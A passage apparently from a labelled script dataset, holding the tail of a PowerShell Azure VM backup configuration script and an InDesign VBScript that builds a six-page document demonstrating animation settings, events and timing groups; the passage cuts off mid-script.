-RetentionPolicy $retPol ` -SchedulePolicy $schPol Set-AzKeyVaultAccessPolicy ` -VaultName "KeyVaultName" ` -ResourceGroupName "KyeVault-RGName" ` -PermissionsToKeys backup,get,list ` -PermissionsToSecrets backup,get,list ` -ServicePrincipalName 262044b1-e2ce-469f-a196-69ab7ada62d3 $pol = Get-AzRecoveryServicesProtectionPolicy -Name "NewPolicy" ` Enable-AzRecoveryServicesProtection ` -Policy $pol ` -Name "myVM" ` -ResourceGroupName "VM-RGName" $retPol = Get-AzRecoveryServicesRetentionPolicyObject -WorkloadType "AzureVM" $retPol.DailySchedule.DurationCountInDays = 365 $pol = Get-AzRecoveryServicesProtectionPolicy -Name "NewPolicy" Set-AzRecoveryServicesProtectionPolicy ` -Policy $pol ` -RetentionPolicy $RetPol $namedContainer = Get-AzRecoveryServicesContainer -ContainerType "AzureVM" -Status "Registered" -FriendlyName "myVM" $item = Get-AzRecoveryServicesItem -Container $namedContainer -WorkloadType "AzureVM" $job = Backup-AzRecoveryServicesItem -Item $item $joblist = Get-AzRecoveryServicesJob -Status "InProgress" Wait-AzRecoveryServicesJob ` -Job $joblist[0] ` -Timeout 43200
combined_dataset/train/non-malicious/sample_34_35.ps1
sample_34_35.ps1
Rem AnimationEncyclopedia.vbs Rem An InDesign VBScript Rem Rem Author: Brenda Burden Rem Creates a 6-page sample doc demonstrating the new InDesign Animation feature Rem Search Reference Rem PAGE ONE - Sample of Animation Properties Rem PAGE TWO - Sample of all Animation Events Rem PAGE THREE - Sample of Additional Animation Properties and Settings, including Duration, Play count, Loop, Speed and Origin Rem PAGE FOUR - Sample of Animate To, Animate From, To Current location Rem PAGE FIVE - Sample of creating Timing Groups, setting Delays, and looping a Timing Group Rem PAGE SIX - Complex A-B-C-D animation that can be created only through scripting (cannot be created in the UI) main function main() Set myInDesign = CreateObject("InDesign.Application.2024") Set myDocument = myInDesign.documents.add mySetUnits myInDesign, idMeasurementUnits.idInches myDocument.transparencyPreferences.blendingSpace = idBlendingSpace.idRGB myDocument.documentPreferences.facingPages = false myDocument.documentPreferences.pageWidth = 11.111 myDocument.documentPreferences.pageHeight = 8.333 Set myRed = myMakeColor(myInDesign, "Red", idColorSpace.idRGB, idColorModel.idProcess, Array(255, 0, 0)) Set myGreen = myMakeColor(myInDesign, "Green", idColorSpace.idRGB, idColorModel.idProcess, Array(0, 255, 0)) Set myBlue = myMakeColor(myInDesign, "Blue", idColorSpace.idRGB, idColorModel.idProcess, Array(0, 0, 255)) Set myPurple = myMakeColor(myInDesign, "Purple", idColorSpace.idRGB, idColorModel.idProcess, Array(200, 0, 255)) Set myLightGray = myMakeColor(myInDesign, "Light Gray", idColorSpace.idRGB, idColorModel.idProcess, Array(200, 200, 200)) Set myNoneSwatch = myDocument.swatches.item("None") Rem Rem Page 1 Rem Rem Create a motion path using motionPathPoints. This is similar to drawing a regular path using the Rem entirePath property. If you wish to set keyframes to correspond to points in the path, use motionPath Rem instead of motionPathPoints. See example on Page 6. mySetUnits myInDesign, idMeasurementUnits.idPoints myMotionPath = Array(Array(Array(Array(0,0),Array(0,0),Array(0,0)),Array(Array(565, 0),Array(565, 0),Array(565, 0)) ),true) myCurvedMotionPath = Array(Array(Array(Array(0,0),Array(0,0),Array(0,0)),Array(Array(565,0),Array(565,-150),Array(565,0)) ),true) mySetUnits myInDesign, idMeasurementUnits.idInches Rem Create a background rectangle. myMakeRectangle myDocument.pages.item(1), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(.25,0,1,11.111), "Animation Properties", "Myriad Pro", 28, idJustification.idCenterAlign, False Rem Add text labels. myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(1.25,1,1.625,10.5), "Motion Path", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(2.25,1,2.625,10.5), "Rotation", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(3.25,1,3.625,10.5), "Opacity", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(4.25,1,4.625,10.5), "Scale", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(5.25,1,5.625,10.5), "Combination", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(6.25,1,6.625,10.5), "Color Fade", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(1), Array(7.25,1,7.625,10.5), "Motion Path with Curve", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangles. Set myRectangle1P1 = myMakeRectangle(myDocument.pages.item(1), Array(1.625,1,2,2), "Motion Path Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle2P1 = myMakeRectangle(myDocument.pages.item(1), Array(2.625,1,3,2), "Rotation Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle3P1 = myMakeRectangle(myDocument.pages.item(1), Array(3.625,1,4,2), "Opacity Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle4P1 = myMakeRectangle(myDocument.pages.item(1), Array(4.625,1,5,2), "Scale Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle5P1 = myMakeRectangle(myDocument.pages.item(1), Array(5.625,1,6,2), "Combination Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle6P1 = myMakeRectangle(myDocument.pages.item(1), Array(6.625,1,7,2), "Color Fade Rectangle Blue", myBlue, myNoneSwatch, 0) Set myRectangle7P1 = myMakeRectangle(myDocument.pages.item(1), Array(6.625,1,7,2), "Color Fade Rectangle Purple", myPurple, myNoneSwatch, 0) Set myRectangle8P1 = myMakeRectangle(myDocument.pages.item(1), Array(7.625,1,8,2), "Motion Path with Curve Rectangle", myPurple, myNoneSwatch, 0) Rem Add animation properties. myRectangle1P1.animationSettings.motionPathPoints = myMotionPath myRectangle2P1.animationSettings.motionPathPoints = myMotionPath myRectangle2P1.animationSettings.rotationArray = Array(Array(0, 0), Array(23, 270)) myRectangle3P1.animationSettings.motionPathPoints = myMotionPath myRectangle3P1.animationSettings.opacityArray = Array(Array(0,100),Array(23,10)) myRectangle4P1.animationSettings.motionPathPoints = myMotionPath myRectangle4P1.animationSettings.scaleXArray = Array(Array(0,100),Array(23,20)) myRectangle4P1.animationSettings.scaleYArray = Array(Array(0,100.0),Array(23,20)) myRectangle5P1.animationSettings.motionPathPoints = myMotionPath myRectangle5P1.animationSettings.scaleXArray = Array(Array(0,100),Array(23,120)) myRectangle5P1.animationSettings.scaleYArray = Array(Array(0,100),Array(23,10)) myRectangle5P1.animationSettings.rotationArray = Array(Array(0,0),Array(23,-270)) myRectangle5P1.animationSettings.opacityArray = Array(Array(0,100),Array(23,25)) myRectangle6P1.animationSettings.motionPathPoints = myMotionPath myRectangle6P1.animationSettings.opacityArray = Array(Array(0,0),Array(23,100)) myRectangle7P1.animationSettings.motionPathPoints = myMotionPath myRectangle7P1.animationSettings.opacityArray = Array(Array(0,100),Array(23, 50)) myRectangle8P1.animationSettings.motionPathPoints = myCurvedMotionPath Set myPageOneTimingSettings = myDocument.spreads.item(1).timingSettings Rem Remove the default On Page Load timing list. myPageOneTimingSettings.timingLists.item(1).delete Rem Add an On Page Click timing list. Set p1TimingOnPageClickList = myPageOneTimingSettings.timingLists.add(idDynamicTriggerEvents.idOnPageClick) Rem Add Animations as separate On Page Click Timing Groups Set p1timingGroup1 = p1TimingOnPageClickList.timingGroups.add(myRectangle1P1, 0) Set p1timingGroup2 = p1TimingOnPageClickList.timingGroups.add(myRectangle2P1, 0) Set p1timingGroup3 = p1TimingOnPageClickList.timingGroups.add(myRectangle3P1, 0) Set p1timingGroup4 = p1TimingOnPageClickList.timingGroups.add(myRectangle4P1, 0) Set p1timingGroup5 = p1TimingOnPageClickList.timingGroups.add(myRectangle5P1, 0) Set p1timingGroup6 = p1TimingOnPageClickList.timingGroups.add(myRectangle6P1, 0) Rem Link Rectangle 6 and 7 p1timingGroup6.timingTargets.add myRectangle7P1,0 Set p1timingGroup7 = p1TimingOnPageClickList.timingGroups.add(myRectangle8P1, 0) Rem Rem Page 2 Rem Set myMotionPreset = myInDesign.MotionPresets.Item("twirl") myDocument.Pages.Add Rem Create a background rectangle. myMakeRectangle myDocument.Pages.Item(2), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(.25,0,1,11.111), "Animation Events", "Myriad Pro", 28, idJustification.idCenterAlign, False Rem Add text labels. myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(1.25,1,1.625,10.5), "On Page Load", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(2.25,1,2.625,10.5), "On Page Click", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(3.25,1,3.625,10.5), "On Click (Self)", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(4.25,1,4.625,10.5), "On Roll Over (Self)", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(5.25,1,5.625,10.5), "On Button Event (On Click)", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.pages.item(2), Array(6.25,1,6.625,10.5), "On State Load of Multi-State Object", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangles. Set myRectangle1P2 = myMakeRectangle(myDocument.pages.item(2), Array(1.625,1,2,2), "On Page Load Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle2P2 = myMakeRectangle(myDocument.pages.item(2), Array(2.625,1,3,2), "On Page Click Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle3P2 = myMakeRectangle(myDocument.pages.item(2), Array(3.625,1,4,2), "Self Click Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle4P2 = myMakeRectangle(myDocument.pages.item(2), Array(4.625,1,5,2), "Self Roll Over Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle5P2 = myMakeRectangle(myDocument.pages.item(2), Array(5.625,1,6,2), "On Button Event (On Click) Rectangle", myPurple, myNoneSwatch, 0) Rem Apply the motion preset to the rectangles. myRectangle1P2.AnimationSettings.Preset = myMotionPreset myRectangle2P2.AnimationSettings.Preset = myMotionPreset myRectangle3P2.AnimationSettings.Preset = myMotionPreset myRectangle4P2.AnimationSettings.Preset = myMotionPreset myRectangle5P2.AnimationSettings.Preset = myMotionPreset Rem Add a button to control the animation of myRectangle5P2. Set myPlayAnimationButton = myDocument.Pages.Item(2).Buttons.Add myPlayAnimationButton.GeometricBounds = Array(5.625,3,6,4) myPlayAnimationButton.Name = "Play Animation Button" myPlayAnimationButton.FillColor = myGreen myPlayAnimationButton.StrokeColor = myNoneSwatch Set myAnimationBehavior = myPlayAnimationButton.AnimationBehaviors.Add myAnimationBehavior.BehaviorEvent = idBehaviorEvents.idMouseDown myAnimationBehavior.EnableBehavior = True myAnimationBehavior.AnimatedPageItem = myRectangle5P2 myAnimationBehavior.Operation = idAnimationPlayOperations.idPlay Rem Add a Multi-State Object (MSO). Set myMSO = myDocument.Pages.Item(2).multiStateObjects.add myMSO.GeometricBounds = Array(6.625,1,7,2) myMSO.Name = "Simple MSO" myMSO.InitiallyHidden = True Rem Name default states. myMSO.states.item(1).Name = "Top State" Set myTopState = myMSO.States.Item(1) myMSO.states.item(2).Name = "Second State" Set mySecondState = myMSO.States.Item(2) Set myThirdState = myMSO.States.Add myThirdState.Name = "Third State" Rem Add page items to the states. Set myRectangleMSO = myMakeRectangle(myTopState, Array(6.625,1,7,2), "Top State Rectangle", myPurple, myNoneSwatch, 0) myRectangleMSO.AnimationSettings.Preset = myMotionPreset Set myOvalMSO = myMakeRectangle(mySecondState, Array(6.625,1,7,2), "Second State Oval", myPurple, myNoneSwatch, 0) myOvalMSO.ConvertShape idConvertShapeOptions.idConvertToOval myOvalMSO.AnimationSettings.Preset = myMotionPreset Set myPolygonMSO = myMakeRectangle(myThirdState, Array(6.625,1,7,2), "Third State Polygon", myPurple, myNoneSwatch, 0) myPolygonMSO.ConvertShape idConvertShapeOptions.idConvertToPolygon myPolygonMSO.AnimationSettings.Preset = myMotionPreset Rem Add a button to control the animation of myMSO. Set myPlayMSOButton = myDocument.pages.item(2).buttons.add myPlayMSOButton.GeometricBounds = Array(6.625,3,7,4) myPlayMSOButton.Name = "Go to Next State of MSO Button" myPlayMSOButton.FillColor = myGreen myPlayMSOButton.StrokeColor = myNoneSwatch Set myMSOBehavior = myPlayMSOButton.GotoNextStateBehaviors.Add myMSOBehavior.AssociatedMultiStateObject = myMSO myMSOBehavior.LoopsToNextOrPrevious = True myMSOBehavior.BehaviorEvent = idBehaviorEvents.idMouseDown Rem Page 2 timing section: Set mySecondSpreadTimingSettings = myDocument.spreads.item(2).timingSettings Rem Remove the default timing list. mySecondSpreadTimingSettings.TimingLists.Item(1).Delete Rem Create On Page Load Set mySecondPageLoadTimingList = mySecondSpreadTimingSettings.TimingLists.add(idDynamicTriggerEvents.idOnPageLoad) Set secondSpreadTimingG1 = mySecondPageLoadTimingList.TimingGroups.Add(myRectangle1P2, 0) Rem Create On Page Click Set mySecondPageClickTimingList = mySecondSpreadTimingSettings.TimingLists.add(idDynamicTriggerEvents.idOnPageClick) Set secondSpreadTimingG2 = mySecondPageClickTimingList.TimingGroups.Add(myRectangle2P2, 0) Rem Create Self Click Set myRectangle3P2TimingList = myRectangle3P2.TimingSettings.TimingLists.Add(idDynamicTriggerEvents.idOnSelfClick) Rem Create Self Roll Over Set myRectangle4P2TimingList = myRectangle4P2.TimingSettings.TimingLists.Add(idDynamicTriggerEvents.idOnSelfRollover) Rem Rem Page 3 Rem myDocument.Pages.Add Rem Create a background rectangle. myMakeRectangle myDocument.Pages.Item(3), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.pages.item(3), Array(.25,0,1,11.111), "Additional Animation Properties and Settings", "Myriad Pro", 28, idJustification.idCenterAlign, False Rem Add text labels. myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(1.25,1,1.625,10.5), "Duration: 2 seconds", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(2.25,1,2.625,10.5), "Duration: .5 seconds", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(3.25,1,3.625,10.5), "Speed: Ease In", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(4.25,1,4.625,10.5), "Speed: Ease Out", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(5.25,1,5.625,10.5), "Speed: Ease In and Out", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(6.25,1,6.625,10.5), "Play Twice", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(7.25,1,7.625,10.5), "Loop", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(1.25,5,1.625,10.5), "Hide Until Animated", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(2.25,5,2.625,10.5), "Hide After Animating", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(3.25,5,3.625,10.5), "Origin Upper Left Corner", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(3), Array(4.25,5,4.625,10.5), "Origin Right, Vertical Center", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangles. Set myRectangle1P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(1.625,1,2,2), "2-Second Duration Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle2P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(2.625,1,3,2), ".5 Second Duration Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle3P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(3.625,1,4,2), "Ease In Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle4P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(4.625,1,5,2), "Ease Out Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle5P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(5.625,1,6,2), "Ease In and Out Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle6P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(6.625,1,7,2), "Play Twice Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle7P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(7.625,1,8,2), "Loop Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle8P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(1.625,5,2,6), "Hide Until Animated Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle9P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(2.625,5,3,6), "Hide After Animated Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle10P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(3.625,5,4,6), "Origin Upper Left Rectangle", myPurple, myNoneSwatch, 0) Set myRectangle11P3 = myMakeRectangle(myDocument.Pages.Item(3), Array(4.625,5,5,6), "Origin Right Center Rectangle", myPurple, myNoneSwatch, 0) Rem Set animation properties. myRectangle1P3.AnimationSettings.Duration = 2 myRectangle1P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle2P3.AnimationSettings.Duration = 0.5 myRectangle2P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(11,180)) myRectangle3P3.AnimationSettings.Duration = 2 myRectangle3P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle3P3.AnimationSettings.EaseType = idAnimationEaseOptions.idEaseIn myRectangle4P3.AnimationSettings.Duration = 2 myRectangle4P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle4P3.AnimationSettings.EaseType = idAnimationEaseOptions.idEaseOut myRectangle5P3.AnimationSettings.Duration = 2 myRectangle5P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle5P3.AnimationSettings.EaseType = idAnimationEaseOptions.idEaseInOut myRectangle6P3.AnimationSettings.Duration = 2 myRectangle6P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle6P3.AnimationSettings.Plays = 2 myRectangle7P3.AnimationSettings.Duration = 2 myRectangle7P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle7P3.AnimationSettings.PlaysLoop = True myRectangle8P3.AnimationSettings.Duration = 2 myRectangle8P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle8P3.AnimationSettings.InitiallyHidden = True myRectangle8P3.AnimationSettings.HiddenAfter = False myRectangle9P3.AnimationSettings.Duration = 2 myRectangle9P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle9P3.AnimationSettings.InitiallyHidden = False myRectangle9P3.AnimationSettings.HiddenAfter = True myRectangle10P3.AnimationSettings.Duration = 2 myRectangle10P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle10P3.AnimationSettings.TransformOffsets = Array(0, 0) myRectangle11P3.AnimationSettings.Duration = 2 myRectangle11P3.AnimationSettings.RotationArray = Array(Array(0,0),Array(47,180)) myRectangle11P3.AnimationSettings.TransformOffsets = Array(1.0,0.5) Rem Rem Page 4 Rem myDocument.Pages.Add Rem Create a background rectangle. myMakeRectangle myDocument.Pages.Item(4), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.Pages.Item(4), Array(.25,0,1,11.111), "Animate Options", "Myriad Pro", 28, idJustification.idCenterAlign, false Rem Add text labels. myMakeTextFrame myInDesign, myDocument.Pages.Item(4), Array(1.25,1,1.625,10.5), "Animate: From Current Appearance", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(4), Array(2.25,1,2.625,10.5), "Animate: To Current Appearance", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(4), Array(3.25,1,3.625,10.5), "Animate: To Current Location", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangles. Set myRectangle1P4 = myMakeRectangle(myDocument.Pages.Item(4), Array(1.625,1,2,2), "Animate From Current Appearance", myPurple, myNoneSwatch, 0) Set myRectangle2P4 = myMakeRectangle(myDocument.Pages.Item(4), Array(2.625,1,3,2), "Animate To Current Appearance", myPurple, myNoneSwatch, 0) set myRectangle3P4 = myMakeRectangle(myDocument.Pages.Item(4), Array(3.625,1,4,2), "Animate To Current Location", myPurple, myNoneSwatch, 0) Rem Set animation properties. myRectangle1P4.AnimationSettings.Preset = myInDesign.MotionPresets.Item("move-right-grow") myRectangle1P4.AnimationSettings.DesignOption = idDesignOptions.idFromCurrentAppearance myRectangle2P4.AnimationSettings.Preset = myInDesign.MotionPresets.Item("move-right-grow") myRectangle2P4.AnimationSettings.DesignOption = idDesignOptions.idToCurrentAppearance myRectangle3P4.AnimationSettings.Preset = myInDesign.MotionPresets.Item("fly-in-left") Rem Rem Page 5 Rem myDocument.Pages.Add Rem Create a background rectangle. myMakeRectangle myDocument.Pages.Item(5), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(.25,0,1,11.111), "Timing Panel - Timing Groups and Delays", "Myriad Pro", 28, idJustification.idCenterAlign, false Rem Add text labels. myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(1.25,1,1.625,10.5), "A-1", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(2.25,1,2.625,10.5), "A-2", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(3.25,1,3.625,10.5), "A-3", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(4.25,1,4.625,10.5), "A-4", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(5.25,1,5.625,10.5), "B-1", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(6.25,1,6.625,10.5), "B-2", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(7.25,1,7.625,10.5), "B-3", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(1.25,5,1.625,10.5), "C-1", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(2.25,5,2.625,10.5), "C-2", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(3.25,5,3.625,10.5), "C-3", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(4.25,5,4.625,10.5), "C-4", "Myriad Pro", 18, idJustification.idLeftAlign, True myMakeTextFrame myInDesign, myDocument.Pages.Item(5), Array(5.25,5,5.625,10.5), "C-5", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangles. Set myRectangle1P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(1.625,1,2,2), "A-1", myPurple, myNoneSwatch, 0) Set myRectangle2P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(2.625,1,3,2), "A-2", myPurple, myNoneSwatch, 0) Set myRectangle3P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(3.625,1,4,2), "A-3", myPurple, myNoneSwatch, 0) Set myRectangle4P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(4.625,1,5,2), "A-4", myPurple, myNoneSwatch, 0) Set myRectangle5P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(5.625,1,6,2), "B-1", myGreen, myNoneSwatch, 0) Set myRectangle6P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(6.625,1,7,2), "B-2", myGreen, myNoneSwatch, 0) Set myRectangle7P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(7.625,1,8,2), "B-3", myGreen, myNoneSwatch, 0) Set myRectangle8P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(1.625,5,2,6), "C-1", myBlue, myNoneSwatch, 0) Set myRectangle9P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(2.625,5,3,6), "C-2", myBlue, myNoneSwatch, 0) Set myRectangle10P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(3.625,5,4,6), "C-3", myBlue, myNoneSwatch, 0) Set myRectangle11P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(4.625,5,5,6), "C-4", myBlue, myNoneSwatch, 0) Set myRectangle12P5 = myMakeRectangle(myDocument.Pages.Item(5), Array(5.625,5,6,6), "C-5", myBlue, myNoneSwatch, 0) Rem Animation settings (note that you cannot use a page item as the target of a timing group Rem if you have not applied animation settings to the it). myRectangle1P5.AnimationSettings.Preset = myMotionPreset myRectangle2P5.AnimationSettings.Preset = myMotionPreset myRectangle3P5.AnimationSettings.Preset = myMotionPreset myRectangle4P5.AnimationSettings.Preset = myMotionPreset myRectangle5P5.AnimationSettings.Preset = myMotionPreset myRectangle6P5.AnimationSettings.Preset = myMotionPreset myRectangle7P5.AnimationSettings.Preset = myMotionPreset myRectangle8P5.AnimationSettings.Preset = myMotionPreset myRectangle9P5.AnimationSettings.Preset = myMotionPreset myRectangle10P5.AnimationSettings.Preset = myMotionPreset myRectangle11P5.AnimationSettings.Preset = myMotionPreset myRectangle12P5.AnimationSettings.Preset = myMotionPreset Rem Page 5 timing section: Set myFifthSpreadTimingSettings = myRectangle1P5.parent.TimingSettings myFifthSpreadTimingSettings.TimingLists.item(1).Delete Set myFifthPageLoadTimingList = myFifthSpreadTimingSettings.TimingLists.Add(idDynamicTriggerEvents.idOnPageLoad) Rem A group. Set myFifthSpreadTimingG1 = myFifthPageLoadTimingList.TimingGroups.Add(myRectangle1P5, 0) myFifthSpreadTimingG1.TimingTargets.Add myRectangle2P5, 0 myFifthSpreadTimingG1.TimingTargets.Add myRectangle3P5, 0 myFifthSpreadTimingG1.TimingTargets.Add myRectangle4P5, 0 Rem B group. Set myFifthSpreadTimingG2 = myFifthPageLoadTimingList.TimingGroups.Add(myRectangle5P5, 1) myFifthSpreadTimingG2.TimingTargets.Add myRectangle6P5,.5 myFifthSpreadTimingG2.TimingTargets.Add myRectangle7P5, 1 Rem Enable Group Loop myFifthSpreadTimingG2.PlaysLoop = True Rem C group. Set myFifthSpreadTimingG3 = myFifthPageLoadTimingList.TimingGroups.Add(myRectangle8P5, .25) myFifthSpreadTimingG3.TimingTargets.Add myRectangle9P5, .25 myFifthSpreadTimingG3.TimingTargets.Add myRectangle10P5, .25 myFifthSpreadTimingG3.TimingTargets.Add myRectangle11P5, .25 myFifthSpreadTimingG3.TimingTargets.Add myRectangle12P5, .25 Rem Enable Group Plays 2 myFifthSpreadTimingG3.Plays = 2 Rem Rem Page 6 Rem myDocument.pages.add() Rem Create a background rectangle. myMakeRectangle myDocument.Pages.Item(6), Array(0,0,8.333,11.111), "Background Rectangle", myLightGray, myNoneSwatch, 0 Rem Create a headline text frame. myMakeTextFrame myInDesign, myDocument.Pages.Item(6), Array(.25,0,1,11.111), "Scripted Animation with Multiple Property Changes", "Myriad Pro", 28, idJustification.idCenterAlign, false Rem Add text label. myMakeTextFrame myInDesign, myDocument.Pages.Item(6), Array(1.25,1,1.625,10.5), "6-Second Animation with one or more property changes per second", "Myriad Pro", 18, idJustification.idLeftAlign, True Rem Add rectangle. Set myRectangle1P6 = myMakeRectangle(myDocument.Pages.Item(6), Array(1.625,1,2,2), "Scripted Animation Rectangle", myPurple, myNoneSwatch, 0) Rem Set duration before adding keyframes when scripting animations myRectangle1P6.AnimationSettings.duration = 6 Rem Assumes 24 Frames Per Second (FPS) Rem 23 = 1 second, 47 = 2 seconds, 71 = 3 seconds, 95 = 4 seconds, 119 = 5 seconds, 143 = 6 seconds mySetUnits myInDesign, idMeasurementUnits.idPoints Rem Note that the animation here is created with motionPath, which allows for setting keyframes that correspond to points in the path myRectangle1P6.AnimationSettings.MotionPath = Array(Array(0, Array(Array(0, 0), Array(0, 0), Array(0, 0))), Array(23, Array(Array(200, 0), Array(200, 0), Array(200, 0))), Array(47, Array(Array(200, 200), Array(200, 200), Array(200, 200))), Array(119, Array(Array(0, 200), Array(0, 200), Array(0, 200))), Array(143, Array(Array(0, 0), Array(0, 0), Array(0, 0)))) mySetUnits myInDesign, idMeasurementUnits.idInches Rem Note that this animation allows setting multiple changes in opacity, scale and rotation that Rem correspond to points in the motion path. This functionality is not available in the Animation panel UI. myRectangle1P6.AnimationSettings.RotationArray = Array(Array(0, 0), 